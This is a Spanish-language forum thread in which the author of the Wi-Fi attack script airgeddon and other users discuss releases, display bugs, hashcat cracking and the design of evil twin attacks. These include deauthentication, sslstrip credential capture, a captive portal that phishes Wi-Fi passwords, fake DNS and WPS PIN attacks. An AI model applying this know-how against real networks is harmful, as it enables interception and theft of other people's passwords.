Si, lo del pete ese es lo q te comentaba, q está solucionado ya en la 3.33

eso es porq al llamarlo desde una ruta absoluta petaba... pero ya está corregido en la que he subido hoy.

respecto al platillo, pues parece que a ti te funciona, aunq algo raro veo.... te sale muy abajo. en teoría sale justo debajo de las letras de airgeddon... hay algo raro ahí...

pero te prometo que en la de 32 bits kde-konsole no va bien... sale como a trozos el platillo... y con el otro entorno grafico XFCE sí que funciona ok. veo tu video y rula... no se, yo flipo... en la 4.11.1 también me peta, no solo es en la 4.12 de desarrollo... lo que ocurre es que no restaura bien la posición del cursor y hace como scroll hacia abajo pintando....

voy a hacer mas pruebas
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:40 (Sábado)
te repito ..

probadas 32 y 64

vuela en todas.

¿resolucion?

intenta...abre la konsola a fullscreen y cierrala para que guarde la ultima posicion ...  y ejecutalo entonces.

es decir, que al abrir se habra a fullscreen ....si el platillo no cabe en la pantalla inicial, nunca va a volar...

pero vamos , a mi me va...sin touch nothing  ;)

_________________-

en xterm que la pantalla es muy pequeña..tambien vuela...jajaja
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 28-05-2016, 23:44 (Sábado)
o lo que nunca falla ..prueba a arrancar en live...sistema limpio.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 23:47 (Sábado)
hostia, q curioso... ya se por donde van los tiros... es lo que comentas, si tengo la consola abierta a tope en la pantalla y a fullscreen, lo lanzo y si rula... el problema aquí es que comienza muy abajo cuando en otras distros sale inmediatamente abajo de las letras de airgeddon....

bueno, ya tengo para pelearme con ello. gracias por la ayuda y disculpa las molestias. voy a ver si lo puedo ajustar para meterlo en la siguiente versión. a ver si averiguo por qué raviolli solo en el Konsole de wifislax empieza tan abajo...

saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-05-2016, 23:56 (Sábado)
ale, arreglao...

parece que había un comando que no le gustaba al Konsole...

tuve que cambiar
echo -e "\n\n\n\n\n\n\n\n\n\033[8F\033[s"

por
echo -e "\033[s"

El caso es que con el primer comando salía ok en todas las demas distros y consolas... pero bueno, parece que con la segunda forma ahora se ve bien en todas partes... así que para la siguiente versión lo subiré, pero voy a ver si meto algo más, q una subida solo con eso es muy soso.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 29-05-2016, 00:59 (Domingo)
cada n, es una new line...por eso tan abajo tio ...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 29-05-2016, 02:46 (Domingo)
joder, ya lo se! si los \n los puse yo... lo q pasa es q no me coge el \033[8F el puto Konsole... pero bueno, q ya está apañado. como te digo, en el resto de distros va bien con los \n

bueno, ya estoy en otra cosa... la vida sigue!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 29-05-2016, 04:37 (Domingo)
creia que la hibas a subir ...en github esta la 3.33 , avisa cuando esten los ovnis listos  >:D
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 29-05-2016, 14:20 (Domingo)
3.34 uploaded y lista para la batalla con sus ovnis voladores!  >:(
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 29-05-2016, 21:25 (Domingo)
3.34 uploaded y lista para la batalla con sus ovnis voladores!  >:(

thanks
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-06-2016, 21:13 (Lunes)
Bueno, ya tengo lista la versión 3.4 a falta de algunas traducciones por revisar...

mil gracias por incluir en la proxima release hashcat. gracias a eso he incluido en el script ataques con hashcat (cpu)

este es el changelog

3.4
Improved regexp to get new interface names after a change
Fixed bug managing paths containing blank spaces
New feature, drag and drop files on console window to entering file paths
New offline decrypting attacks based on cpu hashcat (dictionary, bruteforce and rule based)
Debug mode for faster development skipping intro and initial checks
Bash version check improved for future versions

¿algún valiente que quiere que le pase la beta?
Título: Re: Re: Script multiuso en bash, airgeddon
Publicado por: trancoss2 en 14-06-2016, 00:00 (Martes)
Bueno, ya tengo lista la versión 3.4 a falta de algunas traducciones por revisar...

mil gracias por incluir en la proxima release hashcat. gracias a eso he incluido en el script ataques con hashcat (cpu)

este es el changelog

3.4
Improved regexp to get new interface names after a change
Fixed bug managing paths containing blank spaces
New feature, drag and drop files on console window to entering file paths
New offline decrypting attacks based on cpu hashcat (dictionary, bruteforce and rule based)
Debug mode for faster development skipping intro and initial checks
Bash version check improved for future versions

¿algún valiente que quiere que le pase la beta?
Pásamela si quieres y mañana pruebo si rula

Enviado desde mi HTC One_M8 mediante Tapatalk

Título: Re: Script multiuso en bash, airgeddon
Publicado por: skinoi25 en 14-06-2016, 00:17 (Martes)
Hola
enviame el link para testearlo ya he probado los anteriores
Slds.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-06-2016, 09:21 (Martes)
Gracias por tu interés. Te he enviado por privado un link. Echale un ojo a las nuevas funcionalidades de hashcat.

Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-06-2016, 09:45 (Miércoles)
Hola, estoy buscando gente que quiera colaborar en traducciones del script. Actualmente está en inglés, español, catalán y francés.

¿Hay alguien por aquí que sepa italiano, alemán o portugués? o que se yo, ruso o chino también son bienvenidos!  ;D

Yo le pasaría un listado con todos los strings a traducir con los demás idiomas ya hechos y con el suyo hecho por el traductor automático y luego solo tendría que repasar y corregir las frases que correspondan.

Voy a subir esta semana la versión 3.41 y me gustaría para la siguiente poder subir algún idioma nuevo. ¿alguien se anima? gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: alonoans en 25-06-2016, 13:01 (Sábado)
Hola, estoy buscando gente que quiera colaborar en traducciones del script. Actualmente está en inglés, español, catalán y francés.

¿Hay alguien por aquí que sepa italiano, alemán o portugués? o que se yo, ruso o chino también son bienvenidos!  ;D

Yo le pasaría un listado con todos los strings a traducir con los demás idiomas ya hechos y con el suyo hecho por el traductor automático y luego solo tendría que repasar y corregir las frases que correspondan.

Voy a subir esta semana la versión 3.41 y me gustaría para la siguiente poder subir algún idioma nuevo. ¿alguien se anima? gracias.
MP para português brasileño  8)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-07-2016, 10:53 (Miércoles)
Hola, acabo de subir la versión 3.44

Changelog
Screen resolution detection for optimal windows viewing
Some language strings changed
Deleted ods translations file. It was impractical

Estoy trabajando en una versión 4.0 con nuevo menú y ataques Evil Twin. Va para largo, q es mucha tela.

Alonsoans, ¿Como van las traducciones a portugués? aunque no esté todo pásame aunque sea lo que tengas porfa. También tengo un par de personas que me comentan que lo van a traducir a ruso y polaco, así que bienvenido sea!

Muchas gracias. Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-07-2016, 17:31 (Lunes)
Hola, estoy desarrollando ataques evil twin para el script y tengo 2 problemas. uno que es una pregunta n00b y otro que si que es una movida... empecemos por lo fácil:

1. Una vez tengo montado el ap (al final usé hostapd, airbase me daba unos resultados terribles en las pruebas... desconexiones gratuitas, paquetes perdidos en los ping, etc...) cuando clonas el ap objetivo con mismo bssid, mismo canal y mismo essid... luego cuando lanzas el DoS para desautenticar a sus clientes... también los tiras de tu ap falso! claro, porque está clonado exacto y el ataque también le afecta... ¿qué se suele hacer en estos casos? ¿clonar todo menos yo que se... el canal? si lanzase todo igual pero en otro canal ya el deauth podría hacer que solo afectase al ap real y no al falso... ¿me recomendais algo? supongo que me tocará mirar como lo hacen otros scripts...

2. Para lanzar el hostapd la interfaz ha de estar en managed... desde monitor da un error... sin embargo tras crear el ap falso, luego en el paso de hacer el ataque DoS para deauth del ap real se necesita modo monitor... esto se "salva" muy bien usando airmon-ng en lugar de airmon-zc ya que al hacer el comando que pone el interfaz en monitor, separa el interfaz en dos interfaces uno managed y otro monitor, utilizas uno para cada fin y funcionando... el problema lo tengo en que eso solo funciona en wifislax. Siempre hago que el script sea compatible con otras distros también, y el problema es que al usar el airmon-ng de kali por ejemplo, no me genera dos interfaces... actua igual que el airmon-zc de wifislax, es decir, que cambia el modo y el nombre del interfaz... ¿alguien sabe como simular ese comportamiento en otro linux ya sea kali o la que sea para que se comporte igual que el airmon-ng de wifislax? ¿por qué eso es así? ¿por versión? alguna idea? por favor absteneos de comentarios del tipo "aquí solo damos soporte a wifislax" y esa clase de cosas... esto es una pregunta de linux más que de kali o de cualquier otra distro. El que tenga algo que aportar y quiera ayudar que ayude.

Muchas gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Dark en 18-07-2016, 18:39 (Lunes)
Hola, estoy desarrollando ataques evil twin para el script ...

Creo que esa palabra te viene grande,

exactamente que estas desarrollando?

Citar
supongo que me tocará mirar como lo hacen otros scripts...

Ah! ya me queda mas claro, estas copiando lo que han hecho otros y lo estas añadiendo a tu script.

Hasta ahora que yo haya podido ver, no has hecho nada de tu cosecha mas que copiar código de otros script y traducir y obviamente, lo mas importante, ponerle tu nombre  ;)

Citar
por favor absteneos de comentarios del tipo "aquí solo damos soporte a wifislax" y esa clase de cosas... esto es una pregunta de linux más que de kali o de cualquier otra distro. El que tenga algo que aportar y quiera ayudar que ayude.


No suelo entrar en estas cuestiones pero dado que lo pides tan amablemente, te contesto.

1. si hablas de un script para linux, ¿por que publicas el tema en "Desarrollo y colaboración de nuestras lives", obviamente, se te puede decir muy educadamente que en este tema solo se tratan cosas que tengan que ver con wifislax y no con kali.

2. Creo que aquí hay bastantes foreros que te pueden explicar un par de cosas sobre el funcionamiento de las redes Wi-Fi, yo podría ser uno de ellos, sería mas productivo para todos que te dedicaras a aprender un poco, y no solo a copiar sin saber lo que copias.

3. Se que puede ser molesto que los usuarios de este foro participen de un tema sin aportar gran cosa, pero también es terriblemente molesto que impongas a los foreros que nos abstengamos de hacer comentarios, deberías hacértelo mirar, al igual que yo por entrar al trapo  :-*
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Spanky37 en 18-07-2016, 21:46 (Lunes)
Hola, viendo él ultimo comentario,  no sé porque dices que se dedica a copiar de otros scripts,  lo primero no le conoces,  tendrá un grado de experiencia u otro, lo de revisar otros script, es porque se ha quedado en punto muerto con evil twin, supongo que si copia algo de algún script, ya se encargará él de mencionar los creditos de esa parte.

Por otro lado si fueras un moderador, no estaría escribiendo esto , pero por lo que veo solo eres una persona que se dió de alta en 2013 y no llegas a mas de 24 horas conectado online.

Como ves si algún moderador viera que  v1s1t0r estuviera haciendo algo fuera de lugar, ya se lo habrían dicho hace tiempo, no veo hasta ahora nada de eso, es mas, USUARIONUEVO  le está echando una mano.

Es fín, es mi opinión, si piensas que sabes más que él, demuestralo......
Si no ..... ya sabes.
Un saludo a todos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-07-2016, 22:27 (Lunes)
No por favor, no convirtamos el post en un flame... que yo solo buscaba algo de consejo sobre temas en los que otros pueden tener más experiencia...

Yo soy una persona humilde. Desde el principio dije que no tenía ni idea... y ahora tras todo lo programado en bash algo he aprendido logicamente... el objetivo del script era ese, que me sirviera para aprender a la vez que hiciera una herramienta que le pudiera servir a otros. No pretendo reinventar la rueda, y seguro que hay muchos scripts que ya hacen cosas parecidas... seguro. Pero yo voy añadiendo características y funcionalidades poco a poco... y no solo aprendo bash que era el objetivo inicial. También he aprendido un poco de git (el proyecto está en github), un poco de redes wifi, un poco de linux, de otras distribuciones que desconocía, etc... nunca dije ni diré que yo sea ningún crack ni nada parecido... sí que me gusta el resultado de como va quedando, pero creo que el estar conforme con el trabajo que uno va haciendo no es delito... creo que el script tiene un buen acabado y le hago mucho testing para que no "pete". Estoy intentando hacer un script sólido y muy compatible. Dices algo sobre lo de poner mi nombre en el script... es que yo parece que soy de otro planeta (chiste malo), pero ¿qué nombre quieres que ponga? si quieres pongo programado por Dark... yo es que no entiendo nada.

De verdad que no me dedico a copiar ni mucho menos... precisamente en mi post planteo aquí preguntas y dudas para no tener que copiar... si alguien me pudiera orientar pues genial, así no tendré que mirar otros scripts que es precisamente lo que intento evitar. Si realmente piensas que copio, me gustaría saber en que y donde y a quien... es curiosidad... pero bueno, creo que realmente lo que podrías hacer Dark, es echarme una mano. Si controlas de linux y de wireless como dices me vendría de lujo un cable.

Solo necesito saber como a partir de un interfaz físico, crear dos y que uno pueda estar en modo managed y otro en modo monitor... y todo ello que se pueda hacer al igual que hace wifislax, pero en otras distros estándar (debian, suse, centos, etc). y si, desconozco por qué el airmon de unas distros tiene un comportamiento distinto... y por supuesto que me queda mucho googlear... como ya llevo haciendo durante todo el desarrollo... pero pensé que aquí en este foro habría gente que controla más que yo y que me podría echar una mano. Por supuesto que cada uno puede tener su opinión, y si la tuya Dark es que mi script es una copia barata de no se que... pues nada, que le vamos a hacer. Yo tampoco te se decir porque tampoco he usado muchos scripts, he usado algunos... y no estoy muy puesto en el tema... pero de verdad que solo busco ayuda.

Lo de poner lo de "abstenerse comentarios..." es precisamente por esto... porque no se que le pasa a este foro, que hay mucha gente que controla mucho y mucha gente que te ayuda, pero es como si el ambiente estuviera enrarecido... desde el minuto 1 tuve un flame también completamente gratuito con otro usuario... como ya estoy escarmentado... pues por eso lo ponía, pero tenía que haber supuesto que eso no iba a detener a alguien con ganas de dar la lata. De verdad Dark, te lo pido por favor, no te pongas en frente... ponte al lado y echame un cable.

Muchas gracias.

******
editado después
A la pregunta 1 me respondo yo solo... es lógico que si clonas todo exactamente igual te hagas deauth a ti mismo... ese era el problema. Parece una obviedad, pero también hay que preguntarse ¿y que se hace para que esto no ocurra? he estado viendo dibujillos de esquemas y documentación sobre evil twin... lo que suele hacer la peña es clonarlo todo menos el canal. Es decir, que se genere con el mismo bssid pero en otro canal. He mirado otro script (no el código, sino usando el script y escaneando) y lo que hace es "bailar" un dígito del bssid y ya no es exactamente igual... qué pájaros! la verdad es que ver otros scripts es inspirador a veces. Si llega el punto y he de mirar el código... ¿por qué no? supongo que quien lo publicó bajo GPL es lo que pretendía ¿no? que le pueda servir a otros... al menos es lo que yo hago con el mío, el código es libre para que lo miréis, destripeis, urguéis o lo que os salga del bolo. Haré una mención en los créditos del README de github y así las almas más sensibles se quedarán tranquilas  ;)

A la pregunta 2, por lo que veo en posts como este: http://unix.stackexchange.com/questions/162088/why-airmon-ng-does-not-create-a-monitoring-interface (http://unix.stackexchange.com/questions/162088/why-airmon-ng-does-not-create-a-monitoring-interface) , el que no se genere otro interfaz al lanzar el comando airmon-ng no es por la versión de airmon-ng sino por el driver utilizado... bueno, seguiré investigando... pero que sigo abierto por supuesto a que alguien me aconseje sobre como hacer esto en otras distros. Saludos
******
Título: Re: Script multiuso en bash, airgeddon
Publicado por: dolpsdw en 27-07-2016, 21:52 (Miércoles)
Por lo que tengo entendido, el evil twin ap se crea cambiando el canal porque windows (al menos w7) no tenia en cuenta el canal al que se iba a sociar buscaba por el nombre y se conectaba al que mas señal tuviera.

Por otro lado si lo quieres "universalizar" en otras distros, puedes programarlo para que si el usuario no tiene el airodump viejo, que use 2 tarjetas wifis, una USB y otra la del portatil.

La de WIFI usb externa iria en modo monitor y seria el evil twin.
La del portatil k lance el ataque al real.

(no estoy seguro de que da mejores resultados alomejor si atacas con la tarjeta usb potente consigues mejores resultados.)

PDta: no hagas caso a los Ciber voluNtarIos que a veces estan ahi solo para crear rencor en la comunidad y que no prospere.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-07-2016, 22:06 (Miércoles)
Gracias, pero ya lo tenía resuelto. También he resuelto lo de sacar de una sola tarjeta wifi dos adaptadores uno para usarlo como managed y ponerlo en master para el ap y el otro en monitor para la desautenticación. Me puse a mirar como hacía airmon-ng por dentro y resulta que se hace usando iw directamente... todo controlado y funcionando en todos los linux  ;D

Estoy terminando ya el primero de los ataques Evil Twin... también me faltan algunas traducciones... a ver si mis traductores me lo pasan cuando puedan... yo voy informando de como va la cosa. El primer ataque Evil twin es solo el ap con el dhcp y la deauth... te monta todo el chiringuito para que tú sniffes a los clientes con algún sniffer externo al script ya que al ser tú el router tienes un Man in the middle de todos los clientes de la red que naveguen a internet (ya se que muchos esto ya lo sabéis). Este es el más sencillo y es el que estoy terminando... luego los demás espero que irán más rodados, ya que he montado ya toda la estructura y muchas funciones se reutilizarán...

Los siguientes ataques evil twin que voy a hacer son:

con sniffing integrado -> este es lo mismo que el otro pero en vez de tener que usar un sniffer externo te abrirá alguna ventanica más para sniffar desde el script directamente.... aun no me he puesto, imagino que un ettercap o algo así.

con sniffing integrado y sslstrip -> lo mismo que el anterior pero con el trapi del sslstrip para poder trincar claves de páginas https por las que naveguen los clientes de la red

portal cautivo -> este no tiene nada que ver con los anteriores... será para intentar que pongan la pass de wifi en nuestro portal, al estilo linset (oh que gran script!). Este intuyo que será chungo de hacer así que ya veremos... pero desde luego lo tengo en la lista, aunque sea el último.

Toda esta gaita será la versión 4.0 pero no se cuando lo terminaré y lo subiré, que ahora me voy a pirar de vacaciones y aunque como buen freak me llevaré el portatil, pero no podré darle duro a esto... así que cuando pueda chicos.

La idea es dejar un menú evil twin con todas estas opciones variaditas e intentar que sea lo máximo compatible y que no pete... y por ahora la cosa pinta muy bien. lo único que hay que abrir mucha ventana distinta, pero ya metí el rollo este que detecta resoluciones y tal para pintarlo todo un poco ordenado... también subirá un fix para algunas distros en las que las ventanas al pintarlas se comportan "distinto" en cuanto a posición.

Saludos y gracias a la gente que apoya.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-08-2016, 17:45 (Miércoles)
Hola, hacía un mes que no posteaba por aquí! no es repost (creo  ^-^ )

versión airgeddon 4.1 released.

El segundo de los ataques Evil Twin con sniffing integrado (ettercap). Recordad los que seais pr0s que también está la opción de "Solo AP" y puedes usar el sniffer externo que quieras (wireshark, dsniff, tcpdump o el que quieras).

Pronto viene la 4.11 con traducciones al ruso.

Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-08-2016, 13:33 (Domingo)
Acabo de publicar la versión 4.2. Este ya tiene las traducciones al ruso que salieron en la 4.11 y el tercer de los 4 ataques de Evil Twin, con sniffing y sslstrip integrado.

Os recuerdo que el sslstrip no es infalible 100% y no funciona siempre. Depende de muchos factores. Si la "victima" utiliza accesos directos que están bien construidos (con https://...) no hay nada que hacer. Sin embargo si entra a las webs poniendo cosas como por ejemplo outlook.com pues ahí el sslstrip sí funciona, porque aunque los sitios tienen HSTS activado y te reenvían rápidamente a la misma página pero con https, hay una petición inicial http que es la que aprovecha el sslstrip para separar el tráfico y hacer la conexión https él y mostrar al usuario "victima" la página con http y por lo tanto ya le puede capturar las contraseñas en plano de estos sitios.

También he observado que hay algunos sitios con los que no hay manera de que funcione, este de outlook.com que puse de ejemplo sí funciona, pero facebook.com no... no se que habrán hecho en la web pero no funciona. También depende del navegador. Lo he probado con éxito cuando la "víctima" usa internet explorer o chrome... pero con Firefox en las últimas versiones ya no hay manera... ni en la versión app móvil.

También os recuerdo a los pr0s que teneis la opción de Evil Twin "solo AP" para que te monte el chiringuito y ya tu sniffas con wireshark o con tu sniffer preferido en lugar del ettercap que viene integrado con el script que es un poco más para "n00bs"... de la misma manera podéis haceros el sslstrip con ssltrip+ o como queráis.

Bueno, lo dicho, que no es ciencia 100%. A trastear y a disfrutar! Saludos terrícolas!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-10-2016, 14:47 (Lunes)
Hola, me ha costado más de un mes y medio pero ya está lista la versión 4.3 de airgeddon con el ataque Evil Twin con portal cautivo. Aún no lo he puesto en master, por lo que no se actualizará de momento a todo el mundo, pero el que lo quiera probar lo puede bajar de la rama "EvilTwin". Estamos con las traducciones y demás detallitos chorras que faltan. Dejo un link: https://github.com/v1s1t0r1sh3r3/airgeddon/tree/EvilTwin (https://github.com/v1s1t0r1sh3r3/airgeddon/tree/EvilTwin)

A ver, antes de que se me tiren al cuello las culebrillas silvestres... ¿se parece a linset? Síiiiiiiiiiiiiiiiiiiiii... muchoooooooo.... ¿por qué? porque hace exactamente lo mismo. Es lógico que se parezca. Pero si alguien lo mira por dentro verá muchas diferencias:

-No usa php como linset, es cgi bash puro. Un requerimiento menos.
-Linset usa para el "dns blackhole" un script de python. Yo lo hago todo con iptables, otra cosa menos.
-Linset utiliza librerías js embebidas codificadas en base 64. Algo desde mi punto de vista innecesario pues "engordan" mucho el tamaño del script. Para gustos colores.
-airgeddon también captura las passwords fallidas.

Bueno, y alguna diferencia más... pero es lo de menos. Sin desmerecer a Linset por supuesto que ha sido el script de este tipo yo creo que más famoso durante mucho tiempo. Una pena que el proyecto esté descontinuado, o al menos no veo movimiento en su github. Algún fork por ahí de algún freak para compatibilizarlo con alguna distro y poco más...

Bueno, pues si queréis testearlo ya sabéis, lo bajáis del link y andando. Ya aprovecho para ver que opina la gente sobre un dilema que tengo sobre como dejar la captura de contraseñas... me explico:

En el portal cautivo he filtrado caracteres como <>?/&* para evitar shell injections en el portal y que el que prepara el "tinglao" no sea hackeado... pero uno de mis testers me ha dicho que es una ****da que si la clave lleva uno de esos símbolos pues claro, no sale dicho caracter... porque están filtrados dichos caracteres a propósito. En mi opinión, las contraseñas por defecto de los routers no suelen llevar esos caracteres, y alguien que tenga nivel para entrar y cambiar su clave y poner esos símbolos, no va a ser víctima de un portal cautivo de este tipo (creo yo)... así que yo creo que se debería quedar como está, filtrado.

¿Qué opinais? ¿lo abriríais para capturar todos los caracteres aun a riesgo de que te puedan liar alguna? Gracias.  ^-^
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 10-10-2016, 15:08 (Lunes)
estos dos simbolos si los vi alguna vez, en pass cambiados.

/    &

lo típico

pepe/Antonio
Antonio&pepe

pero vamos , en todos estos años ha sido una sola vez cada uno de ellos ..y del tipo de pass que comento

lo típico de, "hay quiero mucho a mi novi@"  y tal y meten un pass asi de unir names.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Vodker en 10-10-2016, 16:22 (Lunes)

Sin desmerecer a Linset por supuesto que ha sido el script de este tipo yo creo que más famoso durante mucho tiempo. Una pena que el proyecto esté descontinuado, o al menos no veo movimiento en su github. Algún fork por ahí de algún freak para compatibilizarlo con alguna distro y poco más...


Freaks. Interesante adjetivo...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: dynyly en 10-10-2016, 18:07 (Lunes)
salu2
fijo que lo arreglaras en breve .....

wifislax ~ # git clone https://github.com/v1s1t0r1sh3r3/airgeddon/tree/EvilTwin  
Cloning into 'EvilTwin'...
fatal: repository 'https://github.com/v1s1t0r1sh3r3/airgeddon/tree/EvilTwin/' not found
wifislax ~ #

----------

en esta direccion no esta la nuevas mejoras creo

https://github.com/v1s1t0r1sh3r3/airgeddon
imgs   Paypal and bitcoin images added   24 days ago
.gitattributes   v3.44   3 months ago
.gitignore   v3.42   3 months ago
LICENSE   v3.42   3 months ago
README.md   String corrections on README   14 days ago
airgeddon.sh   Updated Greek translations   15 days ago
changelog.txt   Merge changes from master-greek translation to dev branch   20 days ago

-------
 Me baje el zip si parece que si va

gracias por compartir
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 10-10-2016, 18:14 (Lunes)
https://github.com/v1s1t0r1sh3r3/airgeddon/blob/EvilTwin/airgeddon.sh
https://raw.githubusercontent.com/v1s1t0r1sh3r3/airgeddon/EvilTwin/airgeddon.sh
Título: Re: Script multiuso en bash, airgeddon
Publicado por: dynyly en 10-10-2016, 18:20 (Lunes)
gracias
usuario faltaba el sh al final
perfect los links   ;D ;D ;D
gracias a ambos
salu2
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 11-10-2016, 23:14 (Martes)
@Dynyly, para hacer un git clone de un branch, has de especificar el branch:

git clone -b EvilTwin https://github.com/v1s1t0r1sh3r3/airgeddon

@Vodker
Citar
Freaks. Interesante adjetivo...
Que conste que yo me considero un freak más,  :D

@USUARIONUEVO
Citar
pero vamos , en todos estos años ha sido una sola vez cada uno de ellos ..y del tipo de pass que comento

Ok, thx por la info... entiendo por tu comentario que piensas como yo, que mejor tener el filtrado y la seguridad dado lo poco probable de encontrar dichos chars en una pass.

Bueno, hice un par de pushes hoy, corregí algún bug pequeñito y ya parece que están todas las traducciones. Estoy probandolo un poco más en alguno de los linux "raros" que tengo por compatibles... pero tiene pinta de que salvo algo inesperado, esto ya está listo para pasarlo al master y que ya se le actualice a todo el mundo. No se si alguien más quiere hacer algún feedback de última hora antes de que lo haga. Saludos y gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 12-10-2016, 22:26 (Miércoles)
Ya está la versión 4.3 released con el ataque del portal cautivo.

Ahora me toca corregir una cosa que dije... tras hacer pruebas detenidamente, he visto que el portal cautivo no funciona si no hay acceso a internet. Por eso el script en la 4.3 lo requiere para funcionar, pero no siempre es posible tener acceso a internet. Eso es cierto y puede ser un problema...

Estoy trabajando ya en la versión 4.31 en la que se podrá lanzar el portal sin conexión a internet. Es por el dns, o resuelve por internet o hay que montar un server dns o hacer algún trick con algún script o similar... pensaba que se podía resolver 100% con iptables, pero no se puede. La cosa está en que ni siquiera llega la petición al portal si el cliente no puede resolver nada. Veremos que es lo más práctico y sencillo para implementar. Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: vk496 en 12-10-2016, 23:40 (Miércoles)
Buenas,

Muy interesante tu proyecto. Espero sacar tiempo para testearlo  ;D

Salu2
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-10-2016, 00:02 (Jueves)
Coño! vk496!! una leyenda viva! tu script ha sido muchos años muy útil!! ¿por qué lo dejaste? si te quieres involucrar en airgeddon eres más que bienvenido! eso por supuesto! es todo un honor para mi que lo pruebes!  >:(

He estado viendo el código de linset. Sí, tenía curiosidad por ver como lo hacía! y he visto un script de python muy curioso... según pones en los comentarios del código, el script no es tuyo. ¿Se puede saber de donde salió? ¿sería licito reutilizarlo? igual puedo hacer un refactor. La verdad es que no tengo ni zorra de python, pero tampoco tengo ni zorra de bash y la cosa va saliendo adelante! Si no, ¿qué otras alternativas tengo? una que no creo que sea muy dificil sería poner otra dependencia más para el ataque y montar un server dns con "blackhole" hacia el portal... quizás un bind o algo así... no se. La verdad es que lo del trick ese de python funciona muy bien. ¿Se podría hacer algo así con bash puro? la verdad es que no tengo nivel para hacer algo así, si es que se puede...

Gracias y saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Vodker en 13-10-2016, 04:10 (Jueves)

He estado viendo el código de linset. Sí, tenía curiosidad por ver como lo hacía! y he visto un script de python muy curioso... según pones en los comentarios del código, el script no es tuyo. ¿Se puede saber de donde salió?


Creo que te refieres al script de fake DNS. Es de Francisco Santos (http://www.tranquilidadtecnologica.com/2006/04/servidor-fake-dns-en-python.html (http://www.tranquilidadtecnologica.com/2006/04/servidor-fake-dns-en-python.html))

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-10-2016, 10:12 (Jueves)
Sí, gracias! me refería justo a eso. Veo que en la página no pone nada.... ¿es gpl? ¿se puede usar? ¿puedo retocarlo? por supuesto lo nombraría en los créditos... si no, pues busco otra cosa, que habrá alternativas digo yo... aunque la verdad es que está muy chulo este.

Es que la entrada del blog es muy antigua... de 2006. Como no veía ni un mail ni como contactarle para preguntarle he estado mirando así por encima... y vi esto http://code.activestate.com/recipes/491264-mini-fake-dns-server/ (http://code.activestate.com/recipes/491264-mini-fake-dns-server/) que es su mismo script (pero con los comentarios en inglés) subido a otro sitio por él mismo. Voy a ver si puedo contactar con él de alguna manera...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-10-2016, 19:12 (Jueves)
Joer, es que veo el script de python y lo veo tan poca cosa... tan pocas lineas... que dan ganas de liarse la manta a la cabeza e intentar hacerlo pero en bash! así sería otra dependencia menos y quitaría ya el requerimiento de tener internet del captive portal... no se como va realmente, pero me hago una idea... abrir un socket en el puerto 53 udp, escuchar y escupir las salidas preconstruidas que deben tener cierta estructura imitando a lo que devuelve un dns... no tengo ni zorra de nada, pero creo que lo voy a intentar, y si fracaso estrepitosamente pues pongo el python, pero seguro que habré aprendido algo por el camino...

Saludos!

Sorry por el repost...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-11-2016, 13:49 (Jueves)
Bueno, ya está la versión 5.01 de airgeddon con algunas cositas WPS. escaneo con wash, custom pin, pixie attacks y fuerza bruta. todo con las dos opciones de reaver y bully.

También se ha ampliado la compatibilidad para hashcat v3.0 en ataques offline contra ficheros de handshake... que algunos sistemas como kali ya tienen la nueva versión y cambiaban muchas cosas... el comando usa ahora otros parámetros y el parseo de la salida es distinto. Ahora airgeddon maneja eso dependiendo de la versión de hashcat.

Ahora estoy currando una base de datos de pines que voy recopilando de todas partes... la idea es hacerla en un fichero aparte que se pueda actualizar independientemente del script con un sistema de chequeo online por checksum o algo asi... aun estoy en ello. Cuando cuelgue la primera versión me vendría bien cualquier ayuda para seguir rellenándola. También implementaré al algoritmo Zao Chung Shen (o como se escriba xd) para que se añada un pin mas a los posibles pines a probar... no cuesta nada y puede incrementar las posibilidades de éxito.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-12-2016, 16:05 (Martes)
Hola, a pesar del re-que-te-repost, anuncio q hoy publiqué la versión 5.12 de airgeddon. En esta, además de los ya anunciados ataques WPS tanto para reaver como para bully de custom pin, bruteforce y pixie-dust, también incorpora ataque basado en base de datos de pines. Esta base de datos de pines la hemos construido entre mis colaboradores y yo (gracias, sin ellos no podría haberlo hecho). También he implementado un par de algoritmos típicos de generación de pines, el de Zhao ChungSheng y el easyBox.

